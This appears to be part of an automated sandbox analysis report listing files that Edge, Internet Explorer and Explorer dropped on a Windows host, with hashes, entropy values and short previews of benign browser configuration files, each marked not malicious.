                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlHHu:Ls3u
                                MD5:1C2AF8A99869A4C1AE09C316EF1822F6
                                SHA1:83BBE8AF8DD085CF1336F03488402C2350536408
                                SHA-256:C06A5640D9310FA8EBA45913EA056EDD2C4911F392C9505871B7BB402A55F8F1
                                SHA-512:27281BD99A8FC197F99D10A70CE9BFFB38D71A24A13D9FD1622AE927E5329F510B55A2A5669E5B26B5D296BEA6277067C7BB17F0E48ED6579742A5AE68F7656B
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):29
                                Entropy (8bit):3.922828737239167
                                Encrypted:false
                                SSDEEP:3:2NGw+K+:fwZ+
                                MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                Malicious:false
                                Preview:customSynchronousLookupUris_0
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35302
                                Entropy (8bit):7.99333285466604
                                Encrypted:true
                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.5724312513221195
                                Encrypted:false
                                SSDEEP:3:kDnaV6bVon:kDYa2
                                MD5:5692162977B015E31D5F35F50EFAB9CF
                                SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                Malicious:false
                                Preview:edgeSettings_2.0-0
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3581
                                Entropy (8bit):4.459693941095613
                                Encrypted:false
                                SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                MD5:BDE38FAE28EC415384B8CFE052306D6C
                                SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                Malicious:false
                                Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.493433469104717
                                Encrypted:false
                                SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                Malicious:false
                                Preview:synchronousLookupUris_636976985063396749.rel.v2
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):86
                                Entropy (8bit):4.389669793590032
                                Encrypted:false
                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                Malicious:false
                                Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):8243
                                Entropy (8bit):5.7975140948931045
                                Encrypted:false
                                SSDEEP:192:fsNAxMnE7PeiRUtVQck+W+T6qRAq1k8SPxVLZ7VTiQ:fsNAxcEfuqX+d6q3QxVNZTiQ
                                MD5:846392AC951A78AD9BB10E9AD3DE9A1B
                                SHA1:248D97D62E404A600681B04EE22C4B51EF32EB96
                                SHA-256:768AAADBA89CE3555579866E2F4E8BE90C3B494B1A9D2C4BF5EB0DF5FC4F10CD
                                SHA-512:C5499E45DF3296AFCC0D9FFD58171698AD6BE291DA9DBBFAF8B6395561198FA8B4590E7C4A46E62827928F874D72DDD20AFF623589AE4C09D96C1FF74EA0346D
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7607
                                Entropy (8bit):5.57892737417665
                                Encrypted:false
                                SSDEEP:96:I4qsNk/bhfpMnEeye5ih/cIyURLl8RotonnBjUVvliZQ5e4WJk+cH+Tqb3Q+bE3G:ssNwnMnE7PViRUKfQck+W+R+wUV
                                MD5:AA078F17819B8D353C3BA998456B7DD2
                                SHA1:87A7BEA95251C8823397CB1AD512AFCB41B8899B
                                SHA-256:C4AEB7352DC15D89B87837AF0910CC1911267CE9CF05BC4A821F2D26AE8DC895
                                SHA-512:4FFCA358350E06724008626A3B4AA5176DF5C40DDF763BBA902A9E617E70D5560757637E959890763152730B7D3467FADB8388A645A91DFD14EBFF4800DFA9F9
                                Malicious:false
                                Preview:{"apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"host_package_checked_on_browser_version":"117.0
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):24929
                                Entropy (8bit):6.065622114602607
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6TH+iFlWuhuatPo:PMSzMtXijv7CFlDu6A
                                MD5:E225B1F909EA19813C0C61806620E34D
                                SHA1:10671C34FA8D1544DE577CBE535A135ABB70617F
                                SHA-256:1060AE039F8FFA375E2C4801C07AE02D332EBAF8E3E86BD7AF91B58D2A66552D
                                SHA-512:F00C6F68AC2F352765E5087C141166D74B805BC06B2486D9AD5DE6B065A539D2838A00D84DB2EB58B12874A31B498ECE5BD98F6D647F08A727E2D565EAA1BB86
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.081737633410355
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc41EPKLJmrm5VYLaTD90/QL3WIZK0QhPPwGVDHkEtMjwu:TMHdNMNxOEyFym5VYunWimI00OYGVbkt
                                MD5:9662B4AF979A05454FBE51A750F8ED35
                                SHA1:6942663C49A181214BAA07C02F9195DED2F00A7A
                                SHA-256:70B616E7EA3A594EF7A2191AB449FD0A6B9FAE041720C5B9F4533B7091066B9D
                                SHA-512:47BB5E42DF977981C9ECF82E1D450B91A240A3084348FDDE9BFB083BD80AC73956DD9E1485317CBB3586CF0CB7A6CF5F42B76F2A53ADE5520596C7CE65792D37
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1619a1f6,0x01dab001</date><accdate>0x161c1774,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.108623070672766
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkgyJm6taTD90/QL3WIZK0QhPPwGkI5kU5EtMjwu:TMHdNMNxe2kgEWnWimI00OYGkak6EtMb
                                MD5:531E8167FE607D24164117E1798276BF
                                SHA1:290727F6A90F8BB8932A564D13AF649333A1D789
                                SHA-256:D43DEAB5E3AF2B79F78B21716E0D87CCF90F8B5498D9221186CD622069886F44
                                SHA-512:22A281E278EBE9EDDE3C99F0D0E97917E536DC8AD275BBBD6158B42940B54F35C92073AD310975308E734958E0D72D72F69B50125D63733E2C8DB35B7B488637
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x16060098,0x01dab001</date><accdate>0x16086303,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (317), with CRLF line terminators
                                Category:dropped
                                Size (bytes):359
                                Entropy (8bit):5.114777616195062
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4GLMJmdyaTD90/QL3WIZK0QhPPwGyhBcEEtMjwu:TMHdNMNxvLyinWimI00OYGmZEtMb
                                MD5:98F70CD9CF2AD3E6918CDBE3D26BC15F
                                SHA1:7FB85BFDD3A40BEF9AA0E128152C0FB2A982B5B4
                                SHA-256:38DEF4335CF0E869F2A2070F8E1B85609A4D3729511E2B32250A072CE9AB74C4
                                SHA-512:1E9BF0848DFF6122CF2D476C8132B5964C6FA8826163726A01C913BD2B5E973EDB1E9036296EBCDA489E33892B47D70C33C8D6F1A99239F2E9F1386BE5ADF667
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1620d433,0x01dab001</date><accdate>0x162440ca,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):5.1685447184144655
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltq08eDPOOKaihMTtJminaTD90/QL3WIZK0QhPPwGcE5EtMjwu:TMHdNMNxtDPOOKavfanWimI00OYGcE5t
                                MD5:86B11F66283AF0CC065DCF7B95FB011D
                                SHA1:6E4986905B9D4BA16547562B1B6A7ECB77B9A30B
                                SHA-256:92EF80F7DB704B96CE0E8C4A94E874E714B1127428D9C111951C300693FD442F
                                SHA-512:ECA351B1DE683486804800BBFB2B5BA6F7924D6104385A23E1E7588DF8301E964121B72081CB29A59458DD0FC6A8E397F5806B317C1668D1E5ADFE42A1DD1BF8
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x16086303,0x01dab001</date><accdate>0x160ac525,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (307), with CRLF line terminators
                                Category:dropped
                                Size (bytes):349
                                Entropy (8bit):5.111652486374828
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4J2wLJmxEVENaTD90/QL3WIZK0QhPPwGgE5EtMjwu:TMHdNMNxivFUEVE0nWimI00OYGd5EtMb
                                MD5:C8078A930ED270D8AE9FD0E22695FAD2
                                SHA1:709F6786332F01A9B550C40E900265454478F99C
                                SHA-256:0369EC2B9CA920BA84610871824240914EBE76AA3CB5BD9E496213598F51FE72
                                SHA-512:1308CD8BA4B9005A227904BA63A2DDDCAEB9368D5407ECD8CA1F41036C7576AAB9757357419F3D300867BB323E5A3146FB0E0B4170D3CCCF2899679E90872E46
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x160f89df,0x01dab001</date><accdate>0x1612b5e8,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.117832580175709
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwHIJm1IaTD90/QL3WIZK0QhPPwG8K0QU5EtMjwu:TMHdNMNxhGwmQnWimI00OYG8K075EtMb
                                MD5:C93144BB3D220D339E1EEA527B5919CB
                                SHA1:03FEF5B33DA729DEFC16DB54652987DC4A075032
                                SHA-256:2B83954B9015FACD6FBFC24E51534A0A61CC37EF6192CDFC508F7CB7E6DF8416
                                SHA-512:A03AEE35F33F91D98D813C369246FA9E9FFB4F4ECCAC56BA9A72FC96349422A8768A25C7657725BA2A34675537624855170454C4227C26529D775EE9DD748061
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x16280dd2,0x01dab001</date><accdate>0x16280dd2,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.08852636738433
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4QunBu2BLJm/u2BLaTD90/QL3WIZK0QhPPwGAkEtMjwu:TMHdNMNx0nBu2BFmu2BunWimI00OYGxt
                                MD5:9DDCDC3CAD846734D6C985937B337F73
                                SHA1:41A51946135314DD7EE7DE792DA54F6DF7952C55
                                SHA-256:DD965629438B926B6A2EAB9AA15BDE047669E7AD4AE6FC68726AA2C2EA59E52A
                                SHA-512:41937B6A3F2B26C46A74F3EB00B4DBEB0FB580397A80A38A3432D27C7C523CF434152E2F7AFFBB1D33750D691429DF63D6E00FC92169E9C415283466BB0D08B0
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1617788f,0x01dab001</date><accdate>0x1617788f,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.1378829681059095
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTfwJmpwaTD90/QL3WIZK0QhPPwG6Kq5EtMjwu:TMHdNMNxxfuWpnWimI00OYG6Kq5EtMb
                                MD5:24FD9952EA3030E87C7609FBC0FB8CEE
                                SHA1:D612863DE06287526571714210067E0D63CFBA9C
                                SHA-256:B7642E60C1CDC777E37676D8ABD524D20A66D022D9B4D54C4E2A234FD66503D3
                                SHA-512:AB1E9C3CFBED5EDF558DB105980AA4BA8E45FD5206180A5CF931CB35B4D4AF7473C059F011DAED3C299947AC5683046E035B58F39D594C5C731B6112FD9C36D9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x16148f4a,0x01dab001</date><accdate>0x16148f4a,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (315), with CRLF line terminators
                                Category:dropped
                                Size (bytes):357
                                Entropy (8bit):5.091636012921118
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2n0nJmH+LaTD90/QL3WIZK0QhPPwG02CqEtMjwu:TMHdNMNxc0JXunWimI00OYGVEtMb
                                MD5:6B094EBC09EFFEE034AE20BC9F21F477
                                SHA1:8C3853F476D7DEF012FEF95F3973E47FC1E25C3C
                                SHA-256:84E5C4EE49E5F6A0C8584AAF325A22E9576A99C29019CA2DE559DFDF4BD4EF10
                                SHA-512:DF5DC3154F7DF71EDFCC9AF207152641B6EA3E650FA936518C40D99B1E1A85D1D971BB7D3BB797B733C8FEF864DE26207BFB1CEA2951764D4CC550B6EF87BDF8
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x160ac525,0x01dab001</date><accdate>0x160d27ad,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.084123820441461
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4InB+LJmYwLaTD90/QL3WIZK0QhPPwGiwE5EtMjwu:TMHdNMNxfncFounWimI00OYGe5EtMb
                                MD5:7EC4291FBCAA64146B855BA316E1875F
                                SHA1:26B3EF001F22E2004EE0F2302B6A2A30E2C68986
                                SHA-256:2E33E4E255F418B260B0EF3C31F41005DDF5953A20F58715336F06A8BEBA912F
                                SHA-512:D43BB4C961F8859F6B3E18B9F32BD7D7D1F0C8981B4CC4880AE7BEC08CC5A3655A270C4498CDF79B23B9177E250264972521280D05554F451BF59473F09276BB
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x160d27ad,0x01dab001</date><accdate>0x160f89df,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):866
                                Entropy (8bit):7.169026556584067
                                Encrypted:false
                                SSDEEP:24:kUvF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upG+:kUt/6symC+PTCq5TcBUX4bs
                                MD5:BB497071B4DEAC1373FF569EC7531E57
                                SHA1:220E02ACDB1FBD95A4657894524D225F86443D52
                                SHA-256:2F8482F85A3E58E5B558F015BFAA025FBCC7F6FAA9E14F1151586FBC23B138ED
                                SHA-512:382858DC2891CCC5D08FE40CE997ECBAE23C5EAD0E834AA0486C42A7243C2AE27F4E6E1D1D581CB396E635AA7598153BA51FA0A886854A395D175D80571320D0
                                Malicious:false
                                Preview:https://www.msn.com/favicon.ico
                                Process:C:\Windows\explorer.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1019
                                Entropy (8bit):5.236946495216897
                                Encrypted:false
                                SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                Malicious:false
                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2278
                                Entropy (8bit):3.865628495745988
                                Encrypted:false
                                SSDEEP:48:uiTrlKxrgxsSxl9Il8uV1j5lxy+8Q139SS8r+5MVRoid1rc:mf2Y7lxy+L3IS8rhVRC
                                MD5:244E8F33BFB35B131AAC0DD0C72ED836
                                SHA1:0D138A8E3B8741BB846140897FCEAC9A769AE10D
                                SHA-256:E6447790EB077ECDD096AA58357C7CAF3EDAEFBFBF0899EEC5D423330D3BF8F2
                                SHA-512:C6E351B5CEB32080D9AD1C7D461C2A6E68E95D0E2F9F900D2BC6272950861093AFBBC4A0D38FC38DAE0112D91EA388977828670A9D78BC2D5BCC4E678F69A090
                                Malicious:false
